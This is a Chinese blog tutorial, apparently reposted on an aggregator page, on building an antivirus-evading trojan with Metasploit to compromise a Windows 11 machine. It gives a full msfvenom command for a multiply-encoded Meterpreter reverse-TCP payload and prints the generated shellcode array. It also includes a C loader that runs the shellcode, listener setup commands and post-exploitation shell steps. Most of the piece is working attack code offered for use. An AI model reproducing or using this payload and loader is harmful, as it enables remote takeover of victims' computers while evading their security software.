Kali | MSF入侵Windows11

制作免杀木马

木马如何免杀

木马绕过免杀本质上还是更改他的特征码，那么总结一下可以有

编码
加壳免杀
二次编译
分离免杀：即将ShellCode和加载器分离

目前msfvenom的encoder特征基本都进入了杀软的漏洞库，很难实现单一encoder编码而绕过杀软，所以对shellcode进行进一步修改编译成了msf免杀的主流。互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。

木马如何制作

安装编译软件啊哈C/C++
- 原因：Win11无法兼容 VC6
生成一个常见的木马

msf6 > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.0.2 lport=5050 -f c
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.0.2 lport=5050 -f c

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 12 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai succeeded with size 651 (iteration=10)
x86/shikata_ga_nai succeeded with size 678 (iteration=11)
x86/shikata_ga_nai chosen with final size 678
Payload size: 678 bytes
Final size of c file: 2874 bytes
unsigned char buf[] = 
"\xba\x81\xd4\xdf\xb3\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\xa3\x31\x50\x15\x83\xc0\x04\x03\x50\x11\xe2\x74\x6b\x04\xd6"
"\x50\x3b\x61\xc7\x45\x37\xb2\x0c\x2f\x8b\x73\x5d\x52\x68\x69"
"\x62\x5d\x15\x60\x98\x3c\x82\xb8\xc4\xb0\xf0\xf1\xd2\xf0\x3a"
"\x05\xce\x40\x53\xe4\x58\xcb\x9a\xb2\x98\x01\x26\xc0\x19\x1a"
"\x2e\x7e\x20\xf1\x3e\x4a\x8e\xf7\x07\x69\x48\x44\xdc\x26\xdf"
"\x57\x30\xa3\x84\xcf\x1c\x29\xbe\x33\x74\x48\x58\xba\x4e\x94"
"\x1e\x71\xd2\xf1\x0c\xe9\xe4\x9b\x29\x99\x27\xd7\x57\xfe\x3a"
"\x38\x36\x02\xa8\x5e\xeb\xf3\x0b\x95\x52\xa0\x84\x37\x7f\x9c"
"\xfd\x01\xb7\x6a\xaf\xd3\xbf\xb8\x23\x62\xe1\x6a\x66\xc4\xa0"
"\x96\xb7\xf3\xa8\xcf\xdc\x7a\xbf\x06\xa6\xc1\x51\xb7\x93\xa7"
"\x3b\xd1\x42\xd0\xec\x54\xfc\x1e\x61\x06\xd7\x77\x35\xe1\x1f"
"\xf3\x97\xe3\x79\x97\x8a\x28\x4f\x83\x2f\x33\x8a\x2c\x45\x4a"
"\x62\x41\x78\xe0\x57\xf2\x4c\x02\x7b\x9c\x95\x44\xea\xda\x2c"
"\x11\x9d\x70\xc2\x2f\x65\xa6\x91\x12\x53\x14\x71\x77\x0b\x0a"
"\xff\xfc\x80\x1f\x12\xd3\x86\x73\xd8\x11\xdf\x02\xc0\x13\x3a"
"\x23\x52\x42\xcf\xd5\xb9\xaa\x3b\x0a\x07\x2c\xf1\x95\x36\x31"
"\x61\x86\x4d\x17\xd6\x22\x63\x6b\x41\x5a\x67\x29\x51\x8c\x27"
"\x6c\xee\x36\x99\xe6\x24\xa5\x74\x6b\xd4\x70\xb6\xf7\xb0\x09"
"\x50\xab\xcc\x7e\x73\x32\x0c\x85\xea\x75\x72\x06\x3c\xec\x6c"
"\xca\xd6\x19\x30\x3d\x48\x74\x11\xf8\x1c\x94\xc6\x75\xba\x41"
"\xed\xba\xa2\xd6\x0e\xb6\xd0\x7e\x04\x8b\xef\x0d\xb9\xbf\x32"
"\xf4\x60\x46\x9a\xeb\x34\x5e\x3e\x05\x7c\x9f\xf3\x1b\x8d\x15"
"\xc0\xba\xc6\xaf\x9c\x83\x16\x70\xe5\x7c\x8a\x3b\x48\x93\xea"
"\x81\x8d\xff\x96\x0f\x13\x4d\xa8\x61\xab\xae\xbd\x8a\x7b\xeb"
"\xa0\xf3\x2e\x5d\x69\x78\x77\x17\x07\x36\xfb\x0b\x3d\x62\xdb"
"\x8c\x1f\xbe\x62\x0e\x3c\x0d\xc7\x65\x60\xeb\xb4\x73\xc5\xa2"
"\xee\x41\x49\xa4\x9b\x92\x72\x05\xc9\xb6\x34\x78\x11\x1f\xd5"
"\x77\xd7\xd2\x22\xaf\x1a\x84\x78\xb7\xb7\x64\x82\xd6\xcf\x7f"
"\x6b\x7d\xf8\xc4\xf9\xb0\xf2\xe0\x08\xe6\x75\x8c\xef\xa7\xc5"
"\x31\x08\xba\xf6\xf3\x81\x8a\xbb\x55\x1c\x51\x20\x8a\xb0\x0c"
"\xa2\xf0\x56\xfd\x49\xfa\x46\x62\x66\xfb\xcd\xd3\xbe\x54\xdc"
"\x51\x21\x3c\x53\xa4\x77\x97\xe5\xcd\xda\x43\xef\x45\xc8\xe2"
"\xbf\x71\xd2\x9d\xe8\x91\x4b\x1c\x55\xd7\xd8\xe6\x48\x5a\xee"
"\x02\xbd\x36\xe8\x9d\x62\x1c\x58\x75\x43\xc2\x96\x07\x6d\x2a"
"\xc5\xd2\x0f\xd2\xda\xc8\xb6\xb2\xdb\x17\x97\xd7\x2c\x27\x98"
"\xd1\xa3\x0e\xbe\x65\x99\x43\xff\x4f\x97\xe5\xa7\xc4\xcf\x8a"
"\x38\xce\xa8\x5d\x62\xa5\x36\x1a\xc7\x84\x0a\x7d\x6d\x0e\x2f"
"\x4b\x24\xbd\x3f\x8d\x38\xbf\x67\x26\xd6\x06\x7b\x6b\xb3\x68"
"\x96\x30\xfa\x1b\xb9\x74\x73\x1a\x69\x9d\x65\x5b\x93\xd6\xb3"
"\xa7\xed\x92\x83\x2c\x21\x36\x3f\xab\xfc\xdd\x19\xa2\x37\xc5"
"\xda\xc0\x78\x1b\x82\x3e\x42\x07\xcc\x41\x79\xf8\x0d\xca\x11"
"\x20\xd1\xe3\x85\xdb\xd0\x67\x70\x4b\xfa\x66\x31\xe9\x7a\xbd"
"\xc7\xfb\x7b\xd1\x6d\xfb\x2f\x46\xfb\x97\x9c\xf1\xab\x31\x57"
"\x6f\x57\x7d\xbf\x97\xff\xf6\x18\x8d\xbb\x2e\xf0\xc9\x5f\xa4"
"\x1a\x83\x08";

编译c语言为exe文件

#include "stdafx.h"
#include <stdio.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[] =
（这里放生成好的数组）
main()
{
((void(*)(void))&buf)();
}

打开啊哈C，新建一个程序
将我们的代码复制进去
注意！！！：由于stdafx.h是VC6的内置库，啊哈C没有，这里提供stdafx.h的下载地址：链接提取码：code
将原代码中的"stdafx.h"替换成"（下载下来的stdafx.h的绝对路径）"
编译一下，看是否有问题
找到与cpp文件同目录的exe文件，这便是免杀木马

如何渗透Windows11

use exploit/multi/handler	# 开启监听
set payload windows/meterpreter/reverse_tcp	# 设置payload，和生成的木马保持一致
set lhost192.168.174.196	# 设置本地地址，和木马一致
set lport 1250	# 设置本地端口，和木马一致
exploit	# 开始渗透

之后，在靶机上运行之前的免杀木马

渗透成功之后

getuid	# 查看权限
shell	# 打开终端

：）学完博客后，是不是有所启发呢？如果对此还有疑问，欢迎在评论区留言哦。
如果还想了解更多的信息，可以关注我哦，也可以查看我的个人博客网站BeacherHou

C++知识库最新文章

【C++】友元、嵌套类、异常、RTTI、类型转换

通讯录的思路与实现（C语言)

C++PrimerPlus 第七章函数-C++的编程模块（

Problem C: 算法9-9~9-12：平衡二叉树的基本

【C语言】以深厚地基筑伟岸高楼-基础篇（六

c语言常见错误合集

加:2021-07-14 22:56:44 更:2021-07-14 22:57:44

360图书馆购物三丰科技阅读网日历万年历 2024年5日历

-2024/5/4 3:35:14-

图片自动播放器
↓图片自动播放器↓

TxT小说阅读器
↓语音阅读,小说下载,古典文学↓

一键清除垃圾
↓轻轻一点,清除系统垃圾↓

图片批量下载器
↓批量下载图片,美女图库↓

网站联系: qq:121756557 email:121756557@qq.com IT数码